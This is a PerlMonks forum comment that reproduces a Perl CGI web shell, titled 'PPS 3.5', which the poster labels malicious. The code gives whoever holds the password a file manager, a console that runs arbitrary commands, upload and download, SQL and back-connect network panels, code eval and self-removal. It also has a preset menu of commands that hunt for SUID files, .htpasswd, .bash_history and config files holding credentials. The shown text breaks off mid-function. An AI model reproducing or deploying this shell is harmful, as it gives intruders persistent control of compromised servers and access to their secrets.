Beefy Boxes and Bandwidth Generously Provided by pair Networks
Don't ask to ask, just ask
 
PerlMonks  

comment on

( #3333=superdoc: print w/replies, xml ) Need Help??

here is the malicious script below

#!/usr/bin/perl use strict; undef $modules::Module::var; my ($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$dive +,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Re +director,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$Hea +derBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suff +ixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$H +tmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPasswo +rd,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand +,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$ +downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFi +le,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$z +apros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde +,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetNa +me,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$ +Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd):shared; $Password="4c20bd58199372d362ad27c9e2fddef7"; $CommandTimeoutDuration=1000; $tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size +=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive +='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$U +nixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmd +Sep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirect +or=($WinNT?" 2>&1 1>&2":" 1>&1 2>&1");use File::Basename;use MIME::Ba +se64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack( +"H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $ur +l1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ i +f @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; +boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_S +TRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $M +ultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if( +$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Bounda +ry='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderB +ody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'fileda +ta'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list +[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$v +al=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c +",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i( +0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s +/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$k +ey}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="una +me -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|se +d 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if +($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} + {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub h +ddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"'; +$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfre +e();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s +.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0 +]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){retur +n "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];} +}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{m +y @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir +($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse +($arg,@suffixlist);if(-d $arg){print '<tr class='.($id%2==0?"l1":"l2" +).'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td +><form method=POST name='.$ii.'><input type=hidden name=a value=comma +nd><input type=hidden name=d value='.$CurrentDir.'><input type=hidden + name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii +.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($ +arg).' ]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg)) +[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method +="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input +type="hidden" name="a" value="RT"><input type="hidden" name="fdata" v +alue='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" + value='.perm($arg).'><input type="hidden" name="f" value='.$name.'>< +a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td>< +td><form method=POST name='.$ii.'z><input type=hidden name=zip value= +'.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type +=hidden name=a value=command><input type=hidden name=d value='.$Curre +ntDir.'><input type=hidden name=c value=zip><a href="javascript:docum +ent.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST nam +e='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input + type=hidden name=a value=command><input type=hidden name=d value='.$ +CurrentDir.'><input type=hidden name=c value=unzip><a href="javascrip +t:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form metho +d=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name. +'><input type=hidden name=a value=command><input type=hidden name=d v +alue='.$CurrentDir.'><input type=hidden name=c value=deldir><a href=" +javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font +>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/10 +24;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=s +printf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1" +:"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></t +h><td><form name='.$ii.' method=post><input type=hidden name=path id= +view value='.$name.'><input type=hidden name=a value=view_file><input + type=hidden name=d value='.$CurrentDir.'><a href="javascript:documen +t.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink +($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg +))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt meth +od="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><inpu +t type="hidden" name="a" value="RT"><input type="hidden" name="fdata" + value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmo +d" value='.perm($arg).'><input type="hidden" name="f" value='.$name.' +><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td +><td><form name='.$ii.'ed method=post><input type=hidden name=path id +=edit1_file value='.$name.'><input type=hidden name=a value=edit_file +_path><input type=hidden name=d value='.$CurrentDir.'><a href="javasc +ript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='. +$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentD +ir.'"><input type="hidden" name="a" value="download"><input type="hid +den" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.s +ubmit()">D </a></form></td><td><form method=POST name='.$ii.'z><input + type=hidden name=zip value='.$name.'><input type=hidden name=arh_nam +e value='.$ii.'z><input type=hidden name=a value=command><input type= +hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=z +ip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></ +td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip +_name value='.$name.'><input type=hidden name=a value=command><input +type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c va +lue=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a +></form></td><td><form method=POST name='.$ii.'del><input type=hidden + name=del_file value='.$name.'><input type=hidden name=a value=comman +d><input type=hidden name=d value='.$CurrentDir.'><input type=hidden +name=c value=delfile><a href="javascript:document.'.$ii.'del.submit() +">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'} +}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&0 +7777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(ge +tpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0 +];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $ +mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if( +!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#F +FD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>'; +}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font c +olor=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font> +</td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color= +#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td> +';}}else{if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font + color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>' +.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td> +';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00> +'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$mo +nth,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-' +.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02 +d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds); +return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$y +ear,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'. +sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d +",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);r +eturn $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my +@list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $fil +e ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}fo +r $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @ +files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChar +s($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSp +ecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;} $uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print +"Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVED +PWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentD +ir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H +*",$1)/eg;print <<END; <html><head><title>PPS 3.5</title>$HtmlMetaHeader<style>body{backgroun +d-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-dec +oration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-a +lign:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;} +span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border +-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-c +olor:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;backgr +ound-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration: +none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;fo +nt:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;ove +rflow:auto;}.bigarea{width:100%;height:250px;}input,textarea,select{m +argin:0;color:#fff;background-color:#555;border:1px solid #df5;font: +9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:ce +nter;}.toolsInp{width: 300px}.toolsInp1{border: none}.main th{text-al +ign:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5 +e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-fa +mily:Courier,Monospace;}</style></head><body onLoad="changeText();doc +ument.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin +="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 + cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hd +d:<br>DateTime:<br>Pwd:</span></td><td><nobr> END P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);p +rint " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddp +roc`);print "% ]";$time=mt();print "<br>$time$tab <td>";my $cwd="";my + @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($Current +Dir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0>< +td><form method=POST name=cwd0><a href="javascript:document.cwd0.subm +it()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type= +hidden name=a value=command><input type=hidden name=d value='.$Curren +tDir.'><input type=hidden name=c value="changedir"></form></td>';fore +ach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form meth +od=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submi +t()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input typ +e=hidden name=a value=command><input type=hidden name=d value='.$Curr +entDir.'><input type=hidden name=c value="changedir"></form></td>';}} +my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";pr +int $tabe;sub cwdcol{if(!-r $CurrentDir){return '<font color=#FF0000> +'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF +>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font> +';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] + </a></td></td>$tabe";print <<END; </td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SE +RVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr>< +/td></tr>$tabe<table width=100% bgcolor=#444><td><form method="POST" +name=systeminfo><input type="hidden" name="a" value="systeminfo"><inp +ut type=hidden name=d value=$CurrentDir><a href="javascript:document. +systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td>< +form method=POST name=files><input type=hidden name=cc value=$Current +Dir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw +] $fe</a><input type=hidden name=a value=command><input type=hidden n +ame=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentD +ir"></form></td><td><form method="POST" name=consoler><input type="hi +dden" name="a" value="console"><input type="hidden" name="d" value=$C +urrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe +Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman> +<input type=hidden name=d value=$CurrentDir><input type="hidden" name +="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ +$fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backcon +n><input type=hidden name=d value=$CurrentDir><input type="hidden" na +me="a" value="net"><a href="javascript:document.backconn.submit()">$f +w [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name +=evalc><input type=hidden name=d value=$CurrentDir><input type="hidde +n" name="a" value="code"><a href="javascript:document.evalc.submit()" +>$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name +=logout><input type="hidden" name="a" value="logout"><a href="javascr +ipt:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></ +td><td><form method="POST" name=remove><input type="hidden" name="a" +value="remove"><a href="javascript:document.remove.submit()">$fw [ $f +e Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C +0C0C0" size="2"> END }sub PrintLoginForm{print "<center><form name=f method=POST><input typ +e=password name=p><input type=submit value='>>'></form></center>";}su +b PrintPageFooter{print "</font></body></html>";}sub GetCookies{@http +cookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies) +{($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout +{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print +"Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md +5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5 +_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&Print +CommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text +/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");fi +le_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCom +mandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName +$CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type= +hidden name=a value=command><input type=hidden name=d value=$CurrentD +ir><select name=group><option value=delete>Delete</option><option val +ue=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar. +gz]</option></select><input type=submit value='>>' onclick='validate( +)'></tr></form>$dive";sub wr_cur {if(!-w $CurrentDir){print '<font co +lor=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[ +Writeable]</font>';}}sub PrintVar{print <<END; <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% +style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr>< +td><form method=POST><span>Change dir:</span><br><input class=toolsIn +p type=text name=cc value=$CurrentDir><input type=submit value='>>'>< +input type=hidden name=a value=command><input type=hidden name=d valu +e=$CurrentDir><input type=hidden name=c value="changedir"></form></td +><td><form method=POST><span>Read file:</span><br><input class='tools +Inp' type=text name=path><input type=hidden name=a value=view_file><i +nput type=hidden name=d value=$CurrentDir><input type=submit value='> +>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span> END wr_cur();print <<END; <br><input class='toolsInp' type=text name=md><input type=hidden name= +a value=command><input type=hidden name=d value=$CurrentDir><input ty +pe=hidden name=c value="makedir"><input type=submit value='>>'></form +></td><td><form method=POST><span>Make file:</span> END wr_cur();print <<END; <br><input class='toolsInp' type=text name=mf><input type=hidden name= +a value=command><input type=hidden name=d value=$CurrentDir><input ty +pe=hidden name=c value="makefile"><input type=submit value='>>'></for +m></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</spa +n><br><input type="hidden" name="a" value="command"><input type="hidd +en" name="d" value="$CurrentDir"><input class='toolsInp' type=text na +me=c value=''><input type=submit value='>>'></form></td> <td> END &PrintFileUploadForm;print <<END; </td>$tabe END }sub PrintFileUploadForm{print <<END; <span>Upload file: </span> END wr_cur();print <<END; <br><form name="upload_file_form" enctype="multipart/form-data" method +="POST"><input type="file" name="f" class=toolsInp><input type="submi +t" value=">>"><input type="hidden" name="d" value="$CurrentDir"><inpu +t type="hidden" name="a" value="upload"></form><script>function setCo +okie(name,value,expires,path,domain,secure){document.cookie=name+"="+ +escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+pat +h:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}functi +on validate(form){var namelist='';var names=document.getElementsByNam +e('lo'); var lo=document.getElementsByName('zip');for(var i=0;i<name +s.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCoo +kie("f",namelist,"","/");}function sall(form){var namelist='';var ch= +true;var names=document.getElementsByName('lo');var ss=document.getEl +ementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(va +r i=0;i<names.length;i++){names[i].checked=ch;}}</script> END }&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord +$1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr +(hex $1)/eg;return $str;}sub ConsoleP{print <<END; <tr><td><form name="run" method="POST"><br><input type=text size="2" i +d="sub3" disabled value='\$ '><input type="hidden" name="a" value="co +mmand1"><input type="hidden" name="d" value="$CurrentDir"><input type +=text name="c" size=100 class=toolsInp1 id='lsname' onkeypress="s(eve +nt)" value=''><input type=submit class=toolsInp1 id="sub4" value=''>< +/form></td></tr>$tab<td><form name="alias" method="POST"><br><input t +ype="hidden" name="a" value="command1"><input type="hidden" name="d" +value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp>< +option value="ls -lha">List dir</option><option value="lsattr -va">li +st file attributes on a Linux second extended file system</option><op +tion value="netstat -an | grep -i listen">show opened ports</option>< +option value="ps aux">process status</option><optgroup label="-Find-" +></optgroup><option value="find / -type f -perm -04000 -ls">find all +suid files</option><option value="find . -type f -perm -04000 -ls">fi +nd suid files in current dir</option><option value="find / -type f -p +erm -02000 -ls">find all sgid files</option><option value="find . -ty +pe f -perm -02000 -ls">find sgid files in current dir</option><option + value="find / -type f -name config.inc.php">find config.inc.php file +s</option><option value="find / -type f -name &quot;config*&quot;">fi +nd config* files</option><option value="find . -type f -name &quot;co +nfig*&quot;">find config* files in current dir</option><option value= +"find / -perm -2 -ls">find all writable folders and files</option><op +tion value="find . -perm -2 -ls">find all writable folders and files +in current dir</option><option value="find / -type f -name service.pw +d">find all service.pwd files</option><option value="find . -type f - +name service.pwd">find service.pwd files in current dir</option><opti +on value="find / -type f -name .htpasswd">find all .htpasswd files</o +ption><option value="find . -type f -name .htpasswd">find .htpasswd f +iles in current dir</option><option value="find / -type f -name .bash +_history">find all .bash_history files</option><option value="find . +-type f -name .bash_history">find .bash_history files in current dir< +/option><option value="find / -type f -name .fetchmailrc">find all .f +etchmailrc files</option><option value="find . -type f -name .fetchma +ilrc">find .fetchmailrc files in current dir</option><optgroup label= +"-Locate-"></optgroup><option value="locate httpd.conf">locate httpd. +conf files</option><option value="locate vhosts.conf">locate vhosts.c +onf files</option><option value="locate proftpd.conf">locate proftpd. +conf files</option><option value="locate psybnc.conf">locate psybnc.c +onf files</option><option value="locate my.conf">locate my.conf files +</option><option value="locate admin.php">locate admin.php files</opt +ion><option value="locate cfg.php">locate cfg.php files</option><opti +on value="locate conf.php">locate conf.php files</option><option valu +e="locate config.dat">locate config.dat files</option><option value=" +locate config.php">locate config.php files</option><option value="loc +ate config.inc">locate config.inc files</option><option value="locate + config.inc.php">locate config.inc.php</option><option value="locate +config.default.php">locate config.default.php files</option><option v +alue="locate config">locate config* files </option><option value="loc +ate '.conf'">locate .conf files</option><option value="locate '.pwd'" +>locate .pwd files</option><option value="locate '.sql'">locate .sql +files</option><option value="locate '.htpasswd'">locate .htpasswd fil +es</option><option value="locate '.bash_history'">locate .bash_histor +y files</option><option value="locate '.mysql_history'">locate .mysql +_history files</option><option value="locate '.fetchmailrc'">locate . +fetchmailrc files</option><option value="locate backup">locate backup + files</option><option value="locate dump">locate dump files</option> +<option value="locate priv">locate priv files</option></select><input + type=submit id="sub2" value='>>'></form></td><td><form name="l11" me +thod="POST"><br><input type="hidden" name="a" value="command1"><input + type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11' + class=toolsInp> END print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $ar +g(@last){print "<option value=\"$arg\">$arg</option>";}print <<END; </select><input type=submit id="sub5" value='>>'></form></td>$tabe<scr +ipt>document.getElementById('sub3').style.borderColor='#444';document +.getElementById('sub2').style.borderColor='#333';document.getElementB +yId('lsname').style.borderColor='#333';document.getElementById('nnnam +e').style.borderColor='#333';document.getElementById('sub4').style.bo +rderColor='#333';document.getElementById("lsname").style.backgroundCo +lor='#333';document.getElementById("l11").style.backgroundColor='#444 +4';document.getElementById("sub5").style.backgroundColor='#444';docum +ent.getElementById('l11').style.borderColor='#444';document.getElemen +tById('sub5').style.borderColor='#444';document.getElementById("sub3" +).style.backgroundColor='#333';document.getElementById("sub3").style. +borderColor='#333';document.getElementById("sub4").style.backgroundCo +lor='#333';document.getElementById('lsname').focus(); function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.ke +yCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selec +tedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x ++1].text;document.getElementById("lsname").value=t;document.getElemen +tById("l11").selectedIndex=document.getElementById("l11").selectedInd +ex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value +=t;document.getElementById("l11").selectedIndex=document.getElementBy +Id("l11").selectedIndex-1;}}</script>$dive END &PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if( +!-w $_[0]){$wr='<font color=#FF0000> Not writable</font>'}else{$wr=' +<font color=#25ff00> Writeable</font>'}my $time=mt1((stat($_[0]))[8] +);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ff +s();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=spri +ntf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024)). +" MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9 +]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferF +ile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $ +ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$ta +b<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time: + $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding= +0 cellspacing=0 width=100% style='border-top:2px solid #333;border-b +ottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td +><form name=run method=POST><input type=hidden name=a value=command>< +input type=hidden name=d value=$CurrentDir><input type=hidden name=c +value=rename_file><input type=hidden name=path value=".$_[0]."><input + type=text size=20 name=rename_file value=$TransferFile><input type=s +ubmit value=RENAME></form></td><td><form name=run method=POST><input +type=hidden name=a value=command><input type=hidden name=d value=$Cur +rentDir><input type=hidden name=c value=touch_file><input type=hidden + name=path value=".$_[0]."><input type=text size=20 name=touch_file v +alue='$motime'><input type=submit value=TOUCH></form></td><td><form n +ame=run method=POST><input type=hidden name=a value=command><input ty +pe=hidden name=d value=$CurrentDir><input type=text size=20 name=chmo +d value=$Fchmod><input type=hidden name=path value=".$_[0]."><input t +ype=hidden name=c value=chmod_file><input type=submit value=CHMOD></f +orm></td><td><form name=run method=POST><input type=hidden name=a val +ue=download><input type=hidden name=f value=$TransferFile><input type +=hidden name=d value=$CurrentDir><input type=hidden name=path value=$ +TransferFile><input type=submit value=DOWNLOAD></form></td><td><form +name=run method=POST><input type=hidden name=a value=view_file><input + type=hidden name=d value=$CurrentDir><input type=hidden name=path va +lue=$TransferFile><input type=submit value=VIEW></form></td><td><form + name=run method=POST><input type=hidden name=a value=edit_file_path> +<input type=hidden name=d value=$CurrentDir><input type=hidden name=p +ath value=$TransferFile><input type=submit value=EDIT></form></td>$ta +be</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$Curr +entDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h +1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($p +ath);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print " +<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Couri +er New';\">";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</font +>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm( +0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDurati +on second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print +"<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 +cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx n +ame=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Mo +dify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr +>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=leng +th $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand +."ussr"}@last=split(/ussr/,$h);$h=ah $h;print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("last_command","$h","","/");</script> END }sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/gis){$CurrentDi +r=~s!\Q//!/!g;if(!-r $1){$RunCommand="Can't read $1!";chop($CurrentDi +r=`$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"". +$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPa +geHeader("c");print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$OldD +ir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{ +&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt += $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$P +rompt $RunCommand<pre>";$Command = "cd 